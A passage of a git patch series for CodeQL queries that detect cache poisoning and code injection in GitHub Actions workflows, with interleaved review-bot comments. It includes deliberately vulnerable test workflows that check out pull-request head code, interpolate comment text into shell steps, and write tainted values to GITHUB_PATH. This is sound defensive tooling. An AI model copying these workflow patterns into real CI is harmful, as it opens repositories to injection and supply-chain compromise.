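Review bot: In the `workflow_call` disjunct the external-trigger check lands on the callee's own event rather than on the caller's: `e.isExternallyTriggerable()` is required of `e` while `e.getName() = "workflow_call"`, and `caller.getATriggerEvent()` is only tested with `runsOnDefaultBranch`. Whether `workflow_call` counts as externally triggerable is not visible here; if it does not, the disjunct can never hold, and if it does, a caller that runs only on a non-external default-branch trigger would still raise an alert. Binding the caller's event once and testing both properties on it, `exists(Event ce | ce = caller.getATriggerEvent() | ce.isExternallyTriggerable() and runsOnDefaultBranch(ce))`, would keep the same-event pairing this commit introduces for direct triggers. The identical block is repeated in `CachePoisoningByCodeInjection.ql`; moving it into one predicate in `CachePoisoningQuery.qll` would keep the two queries in step.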
+++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -17,16 +17,26 @@ import codeql.actions.security.CodeInjectionQuery import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e where - CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() and + j.getATriggerEvent() = e and // job can be triggered by an external user - j.getATriggerEvent().isExternallyTriggerable() and - // excluding privileged workflows since they can be easily exploited in similar circumstances + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and + // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() and - // The workflow runs in the context of the default branch - runsOnDefaultBranch(j) + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5637bef68a0..2f79bddd77e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.32 +version: 0.0.33 groups: - actions - queries 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml new file mode 100644 index 00000000000..6bfdc5b7d50 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml @@ -0,0 +1,31 @@ +name: Test + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version-file: .nvmrc + + - name: Install NPM dependencies + run: npm ci + + - name: Rebuild the dist/ directory + run: npm run build + + - name: Compare the expected and actual dist/ directories + run: bin/check-build-output-in-dist-directory From 2c96127425896a9f6433970dae012676d0745896 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 16:34:52 +0200 Subject: [PATCH 0319/1267] Improve event context sources + test --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 +- .../Security/CWE-094/.github/workflows/test6.yml | 16 ++++++++++++++++ 2 files changed, 17 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 5f2d36e7cd8..7217796d138 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -200,7 +200,7 @@ class GitHubEventCtxSource extends RemoteFlowSource { or regexp = pathEvent() and flag = "filename" ) and - normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*") + normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") ) } 
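Review bot: `test18.yml` carries no comment saying what outcome it pins, and the diffstat of this commit lists no `.expected` change, so it is presumably a negative case. A header line such as `# Expected: no cache-poisoning alert; pull_request is the externally triggerable event and push is the default-branch event, and no single trigger is both.` would tell the next reader why the fixture combines a PR-head checkout with a `push` filter on `main`. Without it the file reads like a positive example that lost its expected row.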
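Review bot: Anchoring the match at the start of the expression (`"(?i)\\s*" + wrapRegexp(regexp) + ".*"`) removes the `contains(...)` false positive covered by `test6.yml`, but it also stops treating an event field as a source whenever it is not the first token. Expressions such as `format('{0}', github.event.comment.body)` or `inputs.x || github.event.pull_request.title` still evaluate to externally controlled text and would, as far as the hunk shows, no longer match; what `normalizeExpr` and `wrapRegexp` do is not visible here. The trailing `.*` meanwhile keeps accepting boolean results like `github.event.comment.body == 'x'`. Excluding the boolean-returning functions (`contains`, `startsWith`, `endsWith`) explicitly, and adding positive fixtures for `format` and `||`, would cut the false positives without losing those sources. The enclosing `GitHubEventCtxSource` class begins and ends outside the hunk.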
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml new file mode 100644 index 00000000000..535b9bd24be --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml @@ -0,0 +1,16 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + { + echo "recreate_vm=${{ contains(github.event.comment.body, 'recreate-vm') }}" + } >> $GITHUB_OUTPUT + From d344d9b97ad8811b8d2b72953bff3b7516744825 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:23:10 +0200 Subject: [PATCH 0320/1267] Update to latest dataflow shared library --- ql/lib/codeql-pack.lock.yml | 12 +- ql/lib/codeql/actions/DataFlow.qll | 9 +- ql/lib/codeql/actions/TaintTracking.qll | 5 +- .../internal/DataFlowImplSpecific.qll | 3 +- .../dataflow/internal/DataFlowPrivate.qll | 39 ++++- .../dataflow/internal/DataFlowPublic.qll | 2 +- .../internal/TaintTrackingImplSpecific.qll | 3 +- .../internal/TaintTrackingPrivate.qll | 8 +- ql/lib/qlpack.gbo | 13 -- ql/lib/qlpack.yml | 8 +- ql/test/codeql-pack.lock.yml | 12 +- .../CWE-020/CompositeActionsSinks.expected | 8 +- .../CWE-020/CompositeActionsSources.expected | 6 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSinks.expected | 2 +- .../CWE-020/ReusableWorkflowsSources.expected | 6 +- .../ReusableWorkflowsSummaries.expected | 10 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionMedium.expected | 12 +- .../CWE-077/EnvVarInjectionCritical.expected | 24 +-- .../CWE-077/EnvVarInjectionMedium.expected | 24 +-- .../CWE-094/CodeInjectionCritical.expected | 160 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 160 +++++++++--------- .../ArtifactPoisoningCritical.expected | 26 +-- .../CWE-829/ArtifactPoisoningMedium.expected | 26 +-- 25 files changed, 310 insertions(+), 286 deletions(-) delete mode 100644 ql/lib/qlpack.gbo diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false 
diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 1e30061bf45..feafe4f68bb 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -2,18 +2,21 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) data flow analyses. */ + +import codeql.Locations + module DataFlow { private import codeql.dataflow.DataFlow private import codeql.actions.dataflow.internal.DataFlowImplSpecific - import DataFlowMake + import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC - module ActionsConsistency implements DFIC::InputSig { } + module ActionsConsistency implements DFIC::InputSig { } module Consistency { - import DFIC::MakeConsistency + import DFIC::MakeConsistency } } diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll index 16d5d826aa8..8203a54dfeb 100644 --- a/ql/lib/codeql/actions/TaintTracking.qll +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -2,9 +2,12 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) taint-tracking analyses. */ + +import codeql.Locations + module TaintTracking { private import codeql.actions.dataflow.internal.DataFlowImplSpecific private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific private import codeql.dataflow.TaintTracking - import TaintFlowMake + import TaintFlowMake } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 2d3b9696ef6..2e3c13f164c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll 
@@ -4,8 +4,9 @@ */ private import codeql.dataflow.DataFlow +private import codeql.Locations -module ActionsDataFlow implements InputSig { +module ActionsDataFlow implements InputSig { import DataFlowPrivate as Private import DataFlowPublic import Private diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b6b7cd53927..17b29f57025 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -1,3 +1,4 @@ +private import codeql.util.Unit private import codeql.dataflow.DataFlow private import codeql.actions.Ast private import codeql.actions.Cfg as Cfg @@ -8,6 +9,8 @@ private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.dataflow.FlowSteps private import codeql.actions.dataflow.FlowSources +class DataFlowSecondLevelScope = Unit; + cached newtype TNode = TExprNode(DataFlowExpr e) @@ -78,6 +81,9 @@ class DataFlowCall instanceof Cfg::Node { string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } /** @@ -104,6 +110,9 @@ class DataFlowCallable instanceof Cfg::CfgScope { .indexOf(["/action.yml", "/action.yaml"])) else none() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } newtype TReturnKind = TNormalReturn() 
@@ -158,6 +167,19 @@ newtype TContent = predicate forceHighPrecision(Content c) { c instanceof FieldContent } +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + class ContentApprox = ContentSet; ContentApprox getContentApprox(Content c) { result = c } @@ -287,9 +309,13 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { } /** - * a simple local flow step that should always preserve the call context (same callable) + * This is the local flow predicate that is used as a building block in global + * data flow. */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} /** * Holds if data can flow from `node1` to `node2` through a non-local step @@ -366,11 +392,6 @@ predicate clearsContent(Node n, ContentSet c) { none() } */ predicate expectsContent(Node n, ContentSet c) { none() } -/** - * Holds if the node `n` is unreachable when the call context is `call`. - */ -predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } - /** * Holds if flow is allowed to pass from parameter `p` and back to itself as a * side-effect, resulting in a summary from `p` to itself. @@ -400,3 +421,7 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } 
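Review bot: `knownSourceModel` and `knownSinkModel` at the end of `DataFlowPrivate.qll` are added as bare `none()` stubs with no QLDoc, although the predicates around them each have one. The file imports `codeql.actions.dataflow.ExternalFlow`, so model-defined sources and sinks presumably exist, and with these stubs the new `provenance` column in the updated `.expected` files stays empty for them. A comment such as `/** Holds if source is defined by the model named model. Not implemented: no provenance is reported for modelled sources. */`, and the same for sinks, would make it clear that the gap is deliberate and where to fill it in later.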
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 87e8124db91..96568f86db3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -178,7 +178,7 @@ class FieldContent extends Content, TFieldContent { predicate hasLocalFlow(Node n1, Node n2) { n1 = n2 or - simpleLocalFlowStep(n1, n2) or + simpleLocalFlowStep(n1, n2, _) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll index c2d51748f20..2fd062e7660 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -3,9 +3,10 @@ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll */ +private import codeql.Locations private import codeql.dataflow.TaintTracking private import DataFlowImplSpecific -module ActionsTaintTracking implements InputSig { +module ActionsTaintTracking implements InputSig { import TaintTrackingPrivate } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index a7e0d23df2b..b8647339d24 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll 
@@ -14,12 +14,16 @@ private import codeql.actions.Ast */ predicate defaultTaintSanitizer(DataFlow::Node node) { none() } +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } /** * Holds if the additional step from `nodeFrom` to `nodeTo` should be included * in all global taint flow configurations. */ -predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" } /** diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c12..00000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index bf05e80e0a6..48045dbf679 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.33 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 + codeql/util: ^1.0.0 + codeql/yaml: ^1.0.0 + codeql/controlflow: ^1.0.0 + codeql/dataflow: ^1.0.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml 
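Review bot: The previous two-argument `defaultAdditionalTaintStep` is left behind as three commented-out lines directly under `defaultTaintSanitizer`, above the QLDoc of its replacement. Git history already preserves the old signature, and a reader scanning the file can mistake the block for a disabled sanitizer or step; I would delete the `//` lines. The new `model` parameter is bound to `""` with no explanation, so one extra QLDoc line saying why the model string is always empty would help whoever later wires in model provenance.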
@@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 31e367ac317..0a5bfe433e9 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,8 +1,8 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | -| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | 
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 6540b191068..87c185fb5e1 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | -| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 063a26bd6ef..067edb68bb1 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected 
@@ -1,7 +1,7 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | -| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index a45b9acf416..f2178960774 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,5 +1,5 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | 
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 2cabeaca9fa..c76034f74d4 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,7 +1,7 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | -| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | nodes | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index a6be99e1bd0..8589d82d825 100644 
--- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected 
@@ -1,9 +1,9 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | -| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | -| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | 
jobs.job1.outputs.job-output1 | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index c6091f1fc23..7fab238795c 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | 
github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d3b90de71e3..ea360bc56df 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected 
